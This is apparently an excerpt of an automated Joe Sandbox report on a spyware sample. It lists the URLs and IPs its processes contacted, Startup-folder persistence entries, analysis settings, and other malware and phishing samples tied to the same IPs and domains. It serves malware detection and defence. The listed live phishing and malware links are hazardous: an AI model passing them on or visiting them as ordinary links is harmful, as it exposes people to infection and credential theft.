                                                                                                                                                    http://www.info-zip.org/AdobeSync.exe, 00000003.00000002.1393381948.000000000841D000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.000000000801C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.0000000004984000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.0000000002663000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.jsonLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://assets.msn.com/bundles/v1/edgeChromium/latest/money-quote-vertical-watchlist.7e740a00da51bb7LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F6B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://tataragirld.site/2009_New_England_Patriots_seasonoLocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg2045.47LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ntp.msn.comcache-control:publicLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://ntp.msn.com/&lLocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007F21000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007F1F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r4c&FrontEnd=AFLocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://alekberg.net/privacyLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://dnsnl.alekberg.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://appsyndication.org/2006/appsynLVkAi4PBv6.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.a83c7cffbebd84e079LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://sn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://chromium.dns.nextdns.ioLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsfd03.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ntp.msn.com/omLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2108273562.0000000007F07000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034339884.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://assets.msn.com/service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfpLocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.b857251407e592f709ce.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ntp.msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://assets.msn.com/service/news/feed/pages/weblayout?User=m-040C031DFB13691C1F601670FA61685C&actLocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://www.softwareok.de/?Freeware/Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.jsX8LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://public.dns.iij.jp/rLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.js.0.204LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.10b612b41321c229bd80.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        142.250.185.129
                                                                                                                                                                                                        		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                        52.168.117.171
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        23.57.90.139
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                        23.219.82.59
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                        18.164.96.90
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                        162.159.61.3
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        20.110.205.119
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                        		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        23.57.90.169
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                        18.244.18.32
                                                                                                                                                                                                        		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                        23.216.132.32
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		7016CCCH-3USfalse
                                                                                                                                                                                                        188.114.97.3
                                                                                                                                                                                                        		tataragirld.siteEuropean Union
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                        		unknownunknownfalse

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.7

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1585283
                                                                                                                                                                                                        Start date and time:2025-01-07 13:17:06 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 10m 6s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:30
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:LVkAi4PBv6.exe
                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                        Original Sample Name:dc1a25a3cecfd804e569a7238ba1ec7f.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.spyw.evad.winEXE@64/276@22/15
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                                                                                        • Number of executed functions: 114
                                                                                                                                                                                                        • Number of non-executed functions: 277
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.101.57.9, 217.20.57.19, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.186.46, 13.107.42.16, 13.107.6.158, 4.231.68.226, 2.16.168.107, 2.16.168.113, 88.221.110.195, 88.221.110.179, 2.23.227.215, 2.23.227.202, 2.23.227.208, 2.23.227.221, 2.23.227.196, 2.23.227.216, 2.23.227.218, 2.23.227.197, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.21.65.154, 2.21.65.132, 108.141.15.7, 142.250.80.99, 142.250.72.99, 142.250.176.195, 13.107.246.45, 52.149.20.212, 184.28.90.27, 94.245.104.56, 40.126.31.67, 23.219.161.135, 20.25.227.174, 23.96.180.189, 13.107.246.40, 104.117.182.56
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, twc.trafficmanager.net, arc.msn.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com,
                                                                                                                                                                                                        • Execution Graph export aborted for target AdobeSync.exe, PID 6388 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        07:18:12API Interceptor1x Sleep call for process: LVkAi4PBv6.exe modified
                                                                                                                                                                                                        07:18:45API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                                                                                                                        07:18:47API Interceptor17x Sleep call for process: LocalCtrl_alpha_v3.exe modified
                                                                                                                                                                                                        13:18:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT8E5.tmp
                                                                                                                                                                                                        13:18:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        18.164.96.90rfc[1].htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          https://go.activestate.com/-temporary-slug-76276203-462a-4ea4-a2a7-9aa8b64aa490Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            https://www.bfjfinancial.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              https://ct.turing.bzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://surveys.hotjar.com/acb47b15-657f-4926-ae9c-3678736cffb3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://officeonline-sharepoint.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    https://presenter.ahaslides.com/share/silver-stone-homes-llc-1710355442023-r4l5zaxgu6Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      https://solartechnology.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        https://www.eventcreate.com/e/rfp-invitationGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://metamaske.top/about-1.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            162.159.61.3Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                              Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                    Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                      Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                              Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                52.168.117.171https://bitbucket.org/ziphose/obmen/downloads/Doc.7zGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                                                                                                                                  https://francisandcompany-my.sharepoint.com/:f:/g/personal/leonard_franciscolaw_ca/EtcLwGjnCq1FtwXo3x2k5X0Br69UVo7FX3ZQaEMNNamgpA?e=SirqSgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    https://edgecombe0-my.sharepoint.com/:f:/g/personal/culbertsona_edgecombe_edu/EvGBKLX7bMFBnDTuoIGqwggBXiXCblWwNG8YRTgaf1y1lQ?e=va7LD8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      https://newbostondentalcare-my.sharepoint.com/:b:/g/personal/maryellen_newbostondental_com/ERDvxS5UJSxPtXyWuklCyAMBDYWal6mJXrTJHUf_OfHqfg?e=5l0sTuGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                        11fa2b48-c25d-d2a8-7e3d-327f8f3a8ace.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            https://wbguae-my.sharepoint.com/:f:/g/personal/patrick_keyn_wbg_ae/EnS2WSQF1LJFudTErEZ1ybkBoAGYTzI4n0C4pN7OR_tXhg?e=LMj8rt&xsdata=MDV8MDJ8YmFyc2F0YW4uYnJ5YW5AZGVtZS1ncm91cC5jb218N2NkNTA2YjE4OThlNGI1MGVjZTUwOGRjYTNmMTc3Mjl8NGUyY2JmNjJjY2ZiNDNhN2JlM2Y3ZWI3YTg1OGJjZWN8MHwwfDYzODU2NTUwNDY5NTQ0ODA0MHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=K2lnVWhTUzViZWlOSG5nNHZGcUtNTnNpalVLNE9GNGdJN0dWOVF3VmNZYz0%3dGet hashmaliciousEvilProxyBrowse
                                                                                                                                                                                                                                                              https://sway.cloud.microsoft/Sac2nvv7Mrz0mzbj?ref=LinkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=AwsuihGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  https://forms.office.com/e/tBp2XcGpEyGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                    23.57.90.139file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      23.219.82.59Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            sb.scorecardresearch.comw3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.27
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.32
                                                                                                                                                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.173.166.9
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 13.32.110.104
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.27
                                                                                                                                                                                                                                                                            nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.122
                                                                                                                                                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.27
                                                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.38
                                                                                                                                                                                                                                                                            25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.38
                                                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 18.244.18.122
                                                                                                                                                                                                                                                                            chrome.cloudflare-dns.comMansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
